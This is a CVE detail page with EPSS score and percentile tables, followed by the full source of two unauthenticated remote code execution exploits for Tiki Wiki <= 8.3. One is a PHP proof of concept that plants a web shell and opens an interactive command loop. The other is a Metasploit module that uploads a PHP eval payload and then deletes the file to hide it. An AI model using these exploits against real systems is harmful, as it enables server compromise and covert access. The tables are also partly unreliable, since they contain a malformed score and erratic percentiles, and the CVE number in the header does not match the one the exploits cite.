CVE-2012-3996 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.32%	–	–
2022-02-27	–	–	1.32%	–	–
2022-04-03	–	–	1.32%	–	–
2022-05-15	–	–	1.32%	–	–
2022-09-18	–	–	1.32%	–	–
2023-03-12	–	–	–	1.5%	–
2023-04-02	–	–	–	1.77%	–
2023-09-17	–	–	–	1.77%	–
2024-02-11	–	–	–	0.36%	–
2024-03-17	–	–	–	0.42%	–
2024-06-02	–	–	–	0.47%	–
2024-06-16	–	–	–	0.47%	–
2024-09-22	–	–	–	3.33%	–
2024-09-29	–	–	–	3.33%	–
2024-10-06	–	–	–	3.33%	–
2024-12-22	–	–	–	2.41%	–
2025-01-19	–	–	–	2.41%	–
2025-03-18	–	–	–	–	17.23%
2025-03-30	–	–	–	–	17.23%
2025-04-08	–	–	–	–	17.23%
2025-04-08	–	–	–	–	17.23,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	45%
2022-02-27	46%
2022-04-03	69%
2022-05-15	7%
2022-09-18	71%
2023-03-12	85%
2023-04-02	86%
2023-09-17	87%
2024-02-11	71%
2024-03-17	74%
2024-06-02	75%
2024-06-16	76%
2024-09-22	92%
2024-09-29	91%
2024-10-06	92%
2024-12-22	9%
2025-01-19	9%
2025-03-18	95%
2025-03-30	94%
2025-04-08	95%
2025-04-08	95%

<?php /* ----------------------------------------------------------------- Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution ----------------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13s[at]gmail[dot]com software link....: http://info.tiki.org/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerable code in different locations: lib/banners/bannerlib.php:28: $views = unserialize($_COOKIE[$cookieName]); lib/banners/bannerlib.php:136: $views = unserialize($_COOKIE[$cookieName]); tiki-print_multi_pages.php:19: $printpages = unserialize(urldecode($_REQUEST['printpages'])); tiki-print_multi_pages.php:24: $printstructures = unserialize(urldecode($_REQUEST['printstructures'])); tiki-print_pages.php:31: $printpages = unserialize(urldecode($_REQUEST["printpages"])); tiki-print_pages.php:32: $printstructures = unserialize(urldecode($_REQUEST['printstructures'])); tiki-send_objects.php:42: $sendpages = unserialize(urldecode($_REQUEST['sendpages'])); tiki-send_objects.php:48: $sendstructures = unserialize(urldecode($_REQUEST['sendstructures'])); tiki-send_objects.php:54: $sendarticles = unserialize(urldecode($_REQUEST['sendarticles'])); The vulnerability is caused due to all these scripts using "unserialize()" with user controlled input. This can lead to execution of arbitrary PHP code passing an ad-hoc Zend Framework serialized object. [-] Full path disclosure at: http://[host]/[path]/admin/include_calendar.php http://[host]/[path]/tiki-rss_error.php http://[host]/[path]/tiki-watershed_service.php [-] Disclosure timeline: [11/01/2012] - Vulnerability discovered [14/01/2012] - Issue reported to security(at)tikiwiki.org [14/01/2012] - New ticket opened: http://dev.tiki.org/item4109 [23/01/2012] - CVE number requested [23/01/2012] - Assigned CVE-2012-0911 [01/05/2012] - Version 8.4 released: http://info.tiki.org/article191-Tiki-Releases-8-4 [04/07/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } function get_path() { global $host, $path; $packet = "GET {$path}tiki-rss_error.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; if (!preg_match('/in <b>(.*)tiki-rss/', http_send($host, $packet), $m)) die("\n[-] Path not found!\n"); return $m[1]; } print "\n+----------------------------------------------------------------------+"; print "\n| Tiki Wiki CMS Groupware <= 8.3 Remote Code Execution Exploit by EgiX |"; print "\n+----------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /tiki/\n"; die(); } list($host, $path) = array($argv[1], $argv[2]); $f_path = get_path(); print "\n[-] Path disclosure: {$f_path}\n"; class Zend_Search_Lucene_Index_FieldInfo { public $name = '<?php error_reporting(0); print(___); passthru(base64_decode($_SERVER[HTTP_CMD])); die; ?>'; } class Zend_Search_Lucene_Storage_Directory_Filesystem { protected $_dirPath = null; public function __construct($path) { $this->_dirPath = $path; } } interface Zend_Pdf_ElementFactory_Interface {} class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface { protected $_docCount = 1; protected $_name = 'foo'; protected $_directory; protected $_fields; protected $_files; public function __construct($directory, $fields) { $this->_directory = $directory; $this->_fields = array($fields); $this->_files = new stdClass; } } class Zend_Pdf_ElementFactory_Proxy { private $_factory; public function __construct(Zend_Pdf_ElementFactory_Interface $factory) { $this->_factory = $factory; } } // http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf $directory = new Zend_Search_Lucene_Storage_Directory_Filesystem($f_path."sh.php\0"); $__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo); $____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory); $payload = urlencode(serialize($____proxy)); $payload = str_replace('%00', '%2500', $payload); $payload = "printpages={$payload}"; $packet = "POST {$path}tiki-print_multi_pages.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (preg_match('/multiprint/', http_send($host, $packet))) die("[-] Multi-print feature disabled!\n"); $packet = "GET {$path}sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\ntiki-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Tiki Wiki <= 8.3 unserialize() PHP Code Execution', 'Description' => %q{ This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script, which is called with user controlled data from the 'printpages' parameter. The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy class to write arbitrary PHP code to a file on the Tiki Wiki web directory. In order to run successfully three conditions must be satisfied (1) display_errors php setting must be On to disclose the filesystem path of Tiki Wiki, (2) The Tiki Wiki Multiprint feature must be enabled to exploit the unserialize() and (3) a php version older than 5.3.4 must be used to allow poison null bytes in filesystem related functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3. }, 'Author' => [ 'EgiX', # Vulnerability discovery and PoC 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0911' ], [ 'BID', '54298' ], [ 'EDB', '19573' ], [ 'URL', 'http://dev.tiki.org/item4109' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { 'DisableNops' => true, }, 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 04 2012' )) register_options( [ OptString.new('TARGETURI', [ true, "The base path to the web application", "/tiki/"]) ], self.class) end def on_new_session(client) if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin client.fs.file.rm(@upload_php) print_good("#{@peer} - #{@upload_php} removed to stay ninja") rescue print_error("#{@peer} - Unable to remove #{f}") end end end def exploit base = target_uri.path base << '/' if base[-1, 1] != '/' @upload_php = rand_text_alpha(rand(4) + 4) + ".php" @peer = "#{rhost}:#{rport}" print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem") res = send_request_cgi( 'uri' => "#{base}tiki-rss_error.php" ) if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/ print_error "Tiki Wiki path couldn't be disclosed. The php setting 'display_errors' must be On." return else tiki_path = $1 print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}" end php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>" printpages = "O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:" printpages << "{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:" printpages << "{s:12:\"%00*%00_docCount\";i:1;s:8:\"%00*%00_name\";s:3:\"foo\";s:13:\"%00*%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:" printpages << "{s:11:\"%00*%00_dirPath\";s:#{tiki_path.length + @upload_php.length + 1}:\"#{tiki_path + @upload_php}%00\";}" printpages << "s:10:\"%00*%00_fields\";a:1:" printpages << "{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:" printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}" printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}" print_status("#{@peer} - Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { 'uri' => "#{base}tiki-print_multi_pages.php", 'method' => 'POST', 'vars_post' => { 'printpages' => printpages } }) if not res or res.code != 200 print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") return end print_status("#{@peer} - Executing the payload #{@upload_php}") res = send_request_cgi( { 'method' => 'GET', 'uri' => "#{base + @upload_php}", 'headers' => { 'Cmd' => Rex::Text.encode_base64(payload.encoded) } }) if res print_error("#{@peer} - Payload execution failed: #{res.code}") return end end end